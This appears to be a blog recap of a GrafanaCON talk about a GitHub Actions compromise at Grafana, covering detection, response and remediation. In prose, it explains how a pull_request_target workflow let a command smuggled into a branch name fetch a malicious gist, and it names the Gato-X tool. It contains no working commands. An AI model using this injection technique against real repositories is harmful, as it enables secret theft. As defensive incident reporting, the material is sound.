Presenters

Source

Grafana’s CI/CD Nightmare: Lessons from a Security Incident Gone Wrong (But Ended Right!) 🚀

Hey tech enthusiasts! Gather ‘round because we’re diving deep into a real-world security incident that reads like a thriller novel. Nick, a Principal Security Engineer at Grafana, and David, from the Security Engineering Team, shared their harrowing experience at GrafanaCON, where “almost everything that could go wrong, did go wrong.” But don’t worry, it all ends on a high note! 🥳

This isn’t just a story of a breach; it’s a masterclass in how preparation, the right tools, and a proactive mindset can turn a disaster into a learning opportunity.

The “Oh God” Moment: A CI/CD Compromise 😱

It all started on a seemingly normal Saturday morning. Two sharp-eyed security team members spotted a peculiar alert. This wasn’t just any alert; it signaled a complete CI/CD compromise. All of Grafana’s secrets had been exfiltrated by an attacker. Imagine the sinking feeling! 🥶

While most organizations would be in full panic mode, Grafana’s team was able to quickly confirm something crucial: no customer or user impact whatsoever. The attacker hadn’t managed to leverage the stolen secrets for any malicious purposes. Phew! 🙏

Let’s unravel how this happened, the challenges they faced, and the ingenious ways they navigated the crisis.

The Devil is in the Details: GitHub Actions Triggers 😈

David kicked off the technical deep-dive by highlighting a critical distinction in GitHub Actions: pull_request vs. pull_request_target.

  • pull_request: This is the safety vault. Workflows run in the fork maintainer’s context, with no access to your environment or secrets. All good! 👍
  • pull_request_target: This is where things get dicey. It grants immediate access to your repository, including your secrets. It’s designed for legitimate maintenance tasks but becomes a gaping security hole when combined with user-controlled inputs.

This subtle difference, the gap between “looks safe” and “is safe,” was the attacker’s entry point.

The Attack Vector: A Benevolent Change and a Malicious Payload 🎯

On April 25th, a seemingly innocuous change was merged. It looked like a CI improvement, internally contributed by a Grafana employee. However, it involved a switch from pull_request to pull_request_target combined with a script request.

The attacker leveraged this by:

  1. Gaining Access to a Fork: Easy for an open-source company like Grafana.
  2. Triggering the Workflow: Making a pull request against Grafana’s repo.
  3. Exploiting the Vulnerability: The attacker could now run arbitrary commands against Grafana’s secrets.

The payload? Surprisingly simple: a branch name embedded in the workflow. This branch name contained a command to download a GitHub gist filled with malicious code. The attacker used Gato-X, a tool designed to scan and exploit GitHub Actions workflows at scale.

Nick highlighted a significant challenge: Grafana’s reliance on GitHub Actions secrets.

  • GitHub Actions Secrets: These are convenient but can be very liberal in how they provide secrets. They’re often directly injected into the environment without additional checks, making them an easy target for scripts that fetch everything.

While some Grafana repositories had migrated to HashiCorp Vault (a more secure, multi-gate approach), many hadn’t. This meant the attacker, armed with the compromised GitHub token, could access everything in the affected repositories.

The Timeline of Terror: From Vulnerability to Compromise ⏳

The attack unfolded with alarming speed:

  • 16:40: The API was open to introduce the vulnerable change.
  • 17:52: The change was applied, making Grafana vulnerable.
  • Later: A security researcher reported the vulnerability through the bug bounty program, but due to processing times, Grafana couldn’t respond immediately.
  • 04:30 (Next Day): The attacker executed Gato-X and began exfiltrating secrets. This was about 10 hours after the initial vulnerability was introduced.
  • 16:15: The attacker began exploring the stolen secrets, triggering Grafana’s internal alerting system. This was the moment the security team sprung into action.

The Response Arsenal: Tools That Saved the Day 🛠️

Grafana’s response was swift and effective, thanks to a well-equipped security toolkit:

  • IRM (Incident Response Management): A cornerstone for coordination, communication, and keeping everyone on the same page. It integrates with Slack and Google Docs, and is freely available in Grafana Cloud.
  • Loki: Grafana’s log storage database. Crucially, all key logs from GitHub were streamed to Loki, providing a persistent, queryable record that attackers couldn’t delete or that wouldn’t expire. This was invaluable for understanding the full extent of the compromise.
  • Zizmor: An open-source tool for static analysis of GitHub Actions workflows. It flags potentially dangerous patterns like pull_request_target and unpinned actions, helping to identify vulnerabilities before they’re exploited. Grafana even contributed an automated fix suggestion feature to Zizmor! 💡
  • TruffleHog: A dual-use tool that finds secrets. It can also verify these secrets against live services. This was key to detecting the breach when the attacker attempted to validate a “canary token.”
  • Gato-X: The very tool the attacker used! Running Gato-X themselves gave Grafana an “attacker’s eye view,” helping them identify any missed vulnerabilities.

The Secret Weapon: Canary Tokens and Observability 🕊️

The initial detection was a stroke of luck, thanks to security canary tokens. These are low-privilege tokens with no real function, distributed throughout the infrastructure. The moment an attacker tries to use one, an alert fires.

  • The “Canary in the Coal Mine”: One of Grafana’s canary tokens, disguised as a juicy AWS key, was used by the attacker to validate their stolen credentials via TruffleHog. This triggered the alert that brought the security team in.

This highlights the power of observability, not just in production, but in CI/CD pipelines as well. It’s about turning findings into actionable insights.

Lessons Learned: Preparation Beats Reaction ✨

The incident, while terrifying, provided invaluable lessons:

  1. Preparation is Paramount: Proactive measures like canaries, static analysis, and good secret hygiene enable a response, not just a frantic reaction.
  2. CI/CD Observability is Crucial: Don’t neglect visibility in your build and deployment pipelines.
  3. Open Source is a Double-Edged Sword: It empowers attackers but also defenders. Leveraging open-source tools like Zizmor and TruffleHog was a significant advantage.
  4. Earn Your Post-Incident Report: The ability to confidently state “no customer impact” is earned through diligent preparation and response.

The Path Forward: Strengthening Grafana’s Defenses 💪

Following the incident, Grafana implemented several critical changes:

  • Migrated Secrets to Vault: Moving away from the convenience of GitHub Actions secrets to the more secure, albeit more complex, HashiCorp Vault. This introduced some “pain” for developers but was the right security choice.
  • Mandatory Scans: Implementing Zizmor and TruffleHog scans as mandatory checks for every pull request against any GitHub repo in the Grafana organization.
  • Broadened Canary Token Coverage: Distributing more canary tokens to create a more “hellscapey” environment for attackers.
  • Reduced GitHub App Access: Significantly shrinking the broad access that GitHub Apps can sometimes have and revoking “super user” privileges.
  • User Education: Emphasizing that even security experts can miss edge cases, and continuous education is vital.

These measures proved their worth when Grafana encountered similar supply chain attacks impacting other organizations (like Aqua Security and Axios). Due to their strengthened defenses, Grafana was “touched” but not “hit,” preventing any data theft and allowing for verification within hours, not weeks.

This incident serves as a powerful reminder that in the ever-evolving landscape of cybersecurity, vigilance, robust tooling, and a commitment to continuous improvement are not just good practices – they’re essential for survival. Great job, Grafana team! 👏

Appendix